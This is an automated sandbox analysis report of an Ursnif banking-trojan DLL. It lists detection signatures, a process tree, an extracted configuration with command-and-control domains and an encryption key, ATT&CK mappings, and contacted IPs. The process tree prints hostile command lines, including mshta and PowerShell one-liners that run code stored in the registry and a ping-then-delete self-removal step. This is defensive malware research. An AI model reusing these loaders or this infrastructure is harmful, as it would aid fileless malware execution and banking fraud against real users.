Windows
Analysis Report
61ee6edf7de65.dll
Overview
General Information
Detection
Ursnif
Score | Range | Whitelisted | Confidence |
---|---|---|---|
100 | 0 - 100 | false | 100% |
Signatures
Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Writes or reads registry keys via WMI
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Suspicious Call by Ordinal
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number, etc.) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- loaddll32.exe (PID: 912 cmdline: loaddll32.exe "C:\Users\user\Desktop\61ee6edf7de65.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
- cmd.exe (PID: 6348 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61ee6edf7de65.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
- rundll32.exe (PID: 4848 cmdline: rundll32.exe "C:\Users\user\Desktop\61ee6edf7de65.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
- control.exe (PID: 4824 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
- control.exe (PID: 6104 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
- rundll32.exe (PID: 2944 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
- mshta.exe (PID: 6808 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Wulb='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wulb).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
- powershell.exe (PID: 3728 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name meewolqgy -value gp; new-alias -name wuuiocptps -value iex; wuuiocptps ([System.Text.Encoding]::ASCII.GetString((meewolqgy "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
- conhost.exe (PID: 2796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- csc.exe (PID: 5812 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hddjt5kh\hddjt5kh.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
- cvtres.exe (PID: 7104 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA9AF.tmp" "c:\Users\user\AppData\Local\Temp\hddjt5kh\CSCAC4C40391E0044BAAD217F7E1F4E48A.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
- csc.exe (PID: 4408 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\32ysuxeg\32ysuxeg.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
- cvtres.exe (PID: 6312 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC843.tmp" "c:\Users\user\AppData\Local\Temp\32ysuxeg\CSCDD69F677ABA1437DBA6EE4792C92D38A.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
- explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- cmd.exe (PID: 5224 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\61ee6edf7de65.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 3640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- PING.EXE (PID: 5632 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
- cmd.exe (PID: 6152 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\61ee6edf7de65.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 5104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- PING.EXE (PID: 5860 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
- RuntimeBroker.exe (PID: 3092 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
- cmd.exe (PID: 6176 cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\442E.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 6956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- mshta.exe (PID: 6024 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Vn1t='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Vn1t).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
- powershell.exe (PID: 5408 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name vxltksnx -value gp; new-alias -name fgyseccalw -value iex; fgyseccalw ([System.Text.Encoding]::ASCII.GetString((vxltksnx "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
- conhost.exe (PID: 5428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- csc.exe (PID: 6292 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qmanv25g\qmanv25g.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
- cvtres.exe (PID: 3272 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCEBB.tmp" "c:\Users\user\AppData\Local\Temp\qmanv25g\CSC83689403A124ABD8F80AE4A2C14BFB.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
- csc.exe (PID: 4636 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vn3zgr4g\vn3zgr4g.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
- cvtres.exe (PID: 6592 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE6D7.tmp" "c:\Users\user\AppData\Local\Temp\vn3zgr4g\CSCD86376609B0744ABB56928FEBE923C3.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
- cleanup
{
  "RSA Public Key": "bkFTFgKp65D5Jru5rf49R+GXnNukXGpZwjIwkjTtlHtgZk7oxIROD9a73bCW6q+N//ka8JpBA5kzPLmOYX0Yasr3Rl/9Zuz9f2VWaX0efOwZY2QKrOoQ67764YcBo8lsKwkYr7PpHkMHQxnMs6NEKJ6J1N6xfUndxmGR7l13Aaosa8p5sAWD3DLmA1KYT+Yo7POW4hnwwj/vfsWt00ns0kdIj1rxgp6FgYSdcYrFJsGyw1c4V2WgskLjtOH2H4NxYnKJgMX4ugqjKvCIFcuUg9umN2tNFjXLFbc81b/KRkQqTX8MMan6JAeAyuM92LJfIu2ZUFHAyr0vE+Uoz2nr6m8vyE3ODdwccpisKQUEL5E=",
  "c2_domain": ["giporedtrip.at", "habpfans.at"],
  "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"],
  "serpent_key": "OejOdTRHaO03XbEm",
  "tor32_dll": "file://c:\\test\\test32.dll",
  "tor64_dll": "file://c:\\test\\tor64.dll",
  "movie_capture": "30, 8, calc no*ad *terminal* *debug*",
  "server": "50",
  "sleep_time": "1",
  "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60",
  "time_value": "60",
  "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60",
  "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300",
  "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60",
  "not_use(CRC_BCTIMEOUT)": "10",
  "botnet": "20000",
  "SetWaitableTimer_value": "1"
}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | |
| JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | |
| JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | |
| JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | |
| JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | |
(29 entries in total; 5 shown)
System Summary |
---|
Source: | Author: Michael Haag |
Source: | Author: Florian Roth |
Source: | Author: Florian Roth |
Source: | Author: juju4, Jonhnathan Ribeiro, oscd.community |
Source: | Author: Florian Roth |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) |
Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) |
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | Virustotal: |
Source: | Avira: |
Source: | Code function: |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Binary string: | 7 entries |
Source: | Code function: | 6 entries |
Source: | Code function: |
Networking |
---|
Source: | Snort IDS: | 9 entries |
Source: | Network Connect: |
Source: | Domain query: |
Source: | Network Connect: |
Source: | Network Connect: |
Source: | Process created: |
Source: | ASN Name: | 2 entries |
Source: | IP Address: |
Source: | HTTP traffic detected: | 6 entries |
Source: | String found in binary or memory: | 12 entries |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: | 6 entries |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | File source: | 34 entries |
E-Banking Fraud |
---|
Source: | File source: | 34 entries |
Source: | Registry key value created / modified: |
Source: | Code function: |
System Summary |
---|
Source: | WMI Queries: | 11 entries |
Source: | WMI Registry write: | 16 entries |
Source: | Static PE information: |
Source: | Code function: | 24 entries |
Source: | Code function: |
Source: | Code function: | 44 entries |
Source: | Binary or memory string: |
Source: | Key opened: | 2 entries |
Source: | Virustotal: |
Source: | Static PE information: |
Source: | Key opened: |
Source: | Process created: | 48 entries |
Source: | Key value queried: |
Source: | File created: |
Source: | File created: |
Source: | Classification label: |
Source: | File read: |
Source: | Section loaded: | 14 entries |
Source: | Code function: |
Source: | Process created: |
Source: | Mutant created: | 10 entries |
Source: | File read: | 4 entries |
Source: | Key opened: |
Source: | Window detected: |
Source: | File opened: |
Source: | Static PE information: |
Source: | Static PE information: |
Source: | Binary string: | 7 entries |
Source: | Code function: | 17 entries |
Source: | Code function: |
Source: | Static PE information: | 5 entries |
Source: | Process created: | 8 entries |
Source: | File created: | 4 entries |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File source: | 34 entries |
Source: | Process created: | 4 entries |
Source: | Registry key monitored for changes: |
Source: | Process information set: | 237 entries |
Malware Analysis System Evasion |
---|
Source: | Process created: |
Source: | Thread sleep time: | ||
Source: | Thread sleep count: |
Source: | Evasive API call chain: |
Source: | Last function: |
Source: | Dropped PE file which has not been started: |
Source: | Thread delayed: |
Source: | Window / User API: |
Source: | Check user administrative privileges: |
Source: | API coverage: |
Source: | Process information queried: |
Source: | Code function: |
Source: | Thread delayed: |
Source: | Code function: |
Source: | Binary or memory string: |
Source: | Code function: |
Source: | Process token adjusted: |
Source: | Code function: |
Source: | Code function: |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Network Connect: | ||
Source: | Domain query: |
Source: | Section loaded: |
Source: | Memory written: |
Source: | Memory protected: |
Source: | Memory allocated: |
Source: | Memory written: |
Source: | Thread register set: |
Source: | Thread created: |
Source: | Process created: |
Source: | Process created: |
Source: | Binary or memory string: |
Source: | Queries volume information: |
Source: | Code function: |
Source: | Key value queried: |
Source: | Code function: |
Source: | Code function: |
Source: | Code function: |
Source: | Code function: |
Stealing of Sensitive Information |
---|
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1 Valid Accounts | 2 Windows Management Instrumentation | 1 Valid Accounts | 1 Valid Accounts | 1 Obfuscated Files or Information | OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 Data Encrypted for Impact |
Default Accounts | 3 Native API | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 File Deletion | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Email Collection | Exfiltration Over Bluetooth | 2 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | 813 Process Injection | 1 Masquerading | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Valid Accounts | NTDS | 25 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 12 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Access Token Manipulation | LSA Secrets | 1 Query Registry | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 21 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Security Software Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | 813 Process Injection | DCSync | 21 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Rundll32 | Proc Filesystem | 3 Process Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction | |
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | 1 System Owner/User Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | ||
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | 11 Remote System Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop | ||
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Rename System Utilities | Keylogging | 1 System Network Configuration Discovery | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | Inhibit System Recovery |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| 24% | Virustotal | | Browse |
| 100% | Avira | HEUR/AGEN.1211191 | |
No Antivirus matches
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| 100% | Avira | HEUR/AGEN.1108168 | |
| 100% | Avira | HEUR/AGEN.1108168 | |
No Antivirus matches
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| 0% | Avira URL Cloud | safe | |
| 0% | Avira URL Cloud | safe | |
| 0% | Avira URL Cloud | safe | |
| 0% | URL Reputation | safe | |
| 0% | URL Reputation | safe | |
| 0% | Avira URL Cloud | safe | |
| 0% | Avira URL Cloud | safe | |
| 0% | URL Reputation | safe | |
| 0% | Avira URL Cloud | safe | |
| 0% | Avira URL Cloud | safe | |
| 0% | Avira URL Cloud | safe | |
| 0% | Avira URL Cloud | safe | |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
giporedtrip.at | 91.203.174.38 | true | true | | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
| true | | unknown |
| true | | unknown |
| true | | unknown |
| true | | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
| | false | | high |
| | false | | unknown |
| | false | | unknown |
| | false | | unknown |
| | false | | unknown |
| | false | | high |
| | false | | unknown |
| | false | | unknown |
| | false | | low |
| | false | | unknown |
| | false | | high |
| | false | | high |
IP | Domain | Country | ASN | ASN Name | Malicious |
---|---|---|---|---|---|
211.40.39.251 | unknown | Korea Republic of | 3786 | LGDACOMLGDACOMCorporationKR | true |
138.36.3.134 | unknown | Brazil | 264562 | TEXNETSERVICOSDECOMUNICACAOEMINFORMATICALTDBR | true |
91.203.174.38 | giporedtrip.at | Uzbekistan | 47141 | LITTEL-ASRU | true |
121.136.102.4 | unknown | Korea Republic of | 4766 | KIXS-AS-KRKoreaTelecomKR | true |
61.98.7.132 | unknown | Korea Republic of | 9318 | SKB-ASSKBroadbandCoLtdKR | true |
IP |
---|
192.168.2.1 |
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 558657 |
Start date: | 24.01.2022 |
Start time: | 11:09:22 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 15m 33s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | 61ee6edf7de65.dll |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 45 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 2 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.bank.troj.evad.winDLL@48/34@6/6 |
EGA Information: | |
HDC Information: | |
HCA Information: | |
Cookbook Comments: | |
- Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, UsoClient.exe, wuapihost.exe
- TCP Packets have been reduced to 100
- Excluded IPs from analysis (whitelisted): 23.211.6.115
- Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
- Execution Graph export aborted for target mshta.exe, PID 6024 because there are no executed functions
- Execution Graph export aborted for target mshta.exe, PID 6808 because there are no executed functions
- Not all processes were analyzed; the report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size exceeded maximum capacity and may have missing disassembly code.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description |
---|---|---|
11:10:30 | API Interceptor | |
11:10:39 | API Interceptor | |
11:10:44 | API Interceptor |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 11606 |
Entropy (8bit): | 4.883977562702998 |
Encrypted: | false |
SSDEEP: | 192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr |
MD5: | 1F1446CE05A385817C3EF20CBD8B6E6A |
SHA1: | 1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D |
SHA-256: | 2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE |
SHA-512: | 252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 0.9260988789684415 |
Encrypted: | false |
SSDEEP: | 3:Nlllulb/lj:NllUb/l |
MD5: | 13AF6BE1CB30E2FB779EA728EE0A6D67 |
SHA1: | F33581AC2C60B1F02C978D14DC220DCE57CC9562 |
SHA-256: | 168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F |
SHA-512: | 1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 408 |
Entropy (8bit): | 5.01293234302818 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJAsNiWVMRSRa+eNMjSSRrjEzxevVSRNveKP8nQe3CGy:V/DTLDfuH0Wl9eg5r4NevU1eKPJeyGy |
MD5: | 35EAB9A45B1CC09A0099A179AD3DCFE5 |
SHA1: | 42939AC7047BC372300FDD21624100E5C9F83B7F |
SHA-256: | EEEECB79A83F234A098D4E685F9649E562EE2C5180DA03CE782DF3F95D7EB5A7 |
SHA-512: | 03DB096CD43E298A526507BE3252F718516E26ECB50400D052B9C26E76EB89F950770696F2034FD9031E3421EE5F7E225D985BFD92CC51338EC19854C85017C1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 375 |
Entropy (8bit): | 5.22338928296367 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fcBzxs7+AEszIN723fcQx:p37Lvkmb6K2aEBWZETaEQx |
MD5: | DBEC98CFE2AE1215A758F472B026FF34 |
SHA1: | 4605DD9744FEB806A00FD8E6CCB25F275B577C73 |
SHA-256: | 70696285444D57D8BEDBA105CDA7481AA7CF4D62EFC79C1454B7EF659C1ED5C3 |
SHA-512: | FDD7838716515157ADB10B9F446B31298EEE82077F34EFF970618F45E42C593E1626D293B4C5C7E812B92CE06C1C51D6E8BFEA42A5A8BE1D72620B51B39DDAEA |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.623929794032503 |
Encrypted: | false |
SSDEEP: | 48:6WgXE7S5FwYXok+G/W8JU1AZX1ulO3a3/4q:lr7S5ekf+YeqK |
MD5: | F163C1D1CECCF46250870200E14C6929 |
SHA1: | B880A02F929418A0BD6F42F97AC509BB0588BC84 |
SHA-256: | 673DA59906C2CA9646D29EC32569658519AFDA87BC3E730AD591344C3F1CE861 |
SHA-512: | DDE28C0AAEC0D08B9B24E4633375C53AB08B2AEFB00520226DD5AD6215B1E82A438DBB10C7AEAF90A505E4BCAF1F951FDEFA0470A95009D8F96DB78A7692C024 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 872 |
Entropy (8bit): | 5.317124959482677 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6K2aEWETaE5KaM5DqBVKVrdFAMBJTH:Akka6CtE+cKxDcVKdBJj |
MD5: | D7548F253CD5F22DC97E67EE293CE7CE |
SHA1: | 7786139CF9874997146067249B9A194A1D3939ED |
SHA-256: | 1A87A592B08B172333924B6E5CA8FC7C3CA00778B01225E805B9359A0BDAF964 |
SHA-512: | EA0B648ED19690B0028DCACCD2E0714F4B0ACA2DC4FAF11EA31A31B0F6705DD1A5CDCE9BA3B54E98C09850D7B3BAB3B8D55D574F83E53E30863A9C7588362578 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.1086397726225687 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryEXnak7Ynqq/XwPN5Dlq5J:+RI+ycuZhNOXnakS/XwPNnqX |
MD5: | D112602496AF629102D67B4B882A7DA0 |
SHA1: | 71FB2977E08E3D38CAE1E0C4D17AF4B7F81CDFFE |
SHA-256: | 8D0A39E3B8AE49DCBD14D32C1BE64B1DB33A7223A7D8E3270C54D41F4B236A12 |
SHA-512: | FDA136B3AD8351A7C7C5C401FC94D62089E4996A488435B3CC68595933B1C0801366F5EFA4E9FCC6CE8AE1667E17F3C9F5401523BE9A1C31F0EB76FB744FFDEA |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1336 |
Entropy (8bit): | 3.996791252234021 |
Encrypted: | false |
SSDEEP: | 24:HkFm9na7CIVaHEhKdNwI+ycuZhNYakSkPNnq9Sd:2c2Kdm1ulYa3kq9C |
MD5: | 52DBB7ABE93AAC35F9B00E0041FAC3F5 |
SHA1: | EE0D79AB73BAB6E34E69C8D062B319DBD5E4CB6D |
SHA-256: | 599822F45B466D37E66ECD283E3087F01A43C68AA0F85D91D853EA15D7979D76 |
SHA-512: | 9DBB88BF368342A9D3E579B59505A68814BDE76D30451409801EB328883997A701B8D7EE294AD087DBE46D052687E315BD69B3DD98FE4BB1EE3EC75A5B2A58A4 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1336 |
Entropy (8bit): | 4.006521464895929 |
Encrypted: | false |
SSDEEP: | 24:HxFm9ma0yuaH3hKdNwI+ycuZhNOXnakS/XwPNnq9Sd:wJrRKdm1ulO3a3/4q9C |
MD5: | 1D8558748ED793C6050F5A2E5572D113 |
SHA1: | 27D070489053E58906D376D760150CE715E88C86 |
SHA-256: | 007D15A992CB63B600232A1E43C4C430271CB6B513E8538CC25C4B2C544BA65E |
